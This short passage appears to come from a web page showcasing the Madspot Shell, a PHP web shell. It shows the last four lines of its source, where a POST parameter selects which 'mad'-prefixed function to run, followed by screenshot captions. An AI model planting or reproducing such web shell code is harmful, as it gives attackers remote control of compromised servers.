2011     if( !empty($_POST['a']) && function_exists('mad' . $_POST['a']) )
2012             call_user_func('mad' . $_POST['a']);
2013             exit;
2014     ?>

A screenshot of Madspot Shell in action.

madspot shell screenshot
Screenshot of the Madspot shell